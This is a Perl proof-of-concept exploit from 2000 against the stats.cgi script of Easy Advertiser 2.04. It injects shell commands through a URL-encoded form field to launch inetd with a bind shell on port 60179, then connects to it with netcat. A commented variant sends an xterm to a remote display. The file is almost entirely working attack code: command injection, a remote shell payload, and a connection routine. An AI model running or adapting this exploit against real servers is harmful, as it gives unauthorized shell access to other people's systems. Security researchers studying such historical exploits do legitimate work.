#!/usr/bin/perl -w ## Easy Advertiser v. 2.04 / (c) 1999 Smokey ## Communications, LLC - PoC exploit. ## http://www.smokey.net/ ## ## Exploits an insecure open() in that stats.cgi ## script. The exploit will attempt to bind a ## shell with nobody/99 privileges on port 60179 ## This will not work if the $target does not ## have inetd installed. I have included the code ## to simply spawn an xterm as well. ## ## [Wed Oct 4 16:53:05 CEST 2000] ## (c) teleh0r@doglover.com / anno 2000 ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 1) { print("Usage: $0 \n"); exit(1); } my ($target,$length,$cgicode,$agent,$sploit, $iaddr,$paddr,$proto); $target = $ARGV[0]; print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/stats.cgi\n"); $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; $cgicode = # echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass; # /usr/sbin/inetd /tmp/.hass "stats=stats&name=teleh0r&adsn=%7Cecho+%27fido+stream+tcp+nowait". "+nobody+%2Fbin%2Fbash+bash+-i%27+%3E+%2Ftmp%2F.hass%3B%2Fusr%2F". "sbin%2Finetd+%2Ftmp%2F.hass%7C&login=Login"; # - Spawn an xterm - # "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+target.com". # "%3A0%7C&login=Login"; $sploit = "POST /cgi-bin/stats.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: 168 $cgicode"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); sleep(5); system("nc -w 10 $target 60179"); exit(0);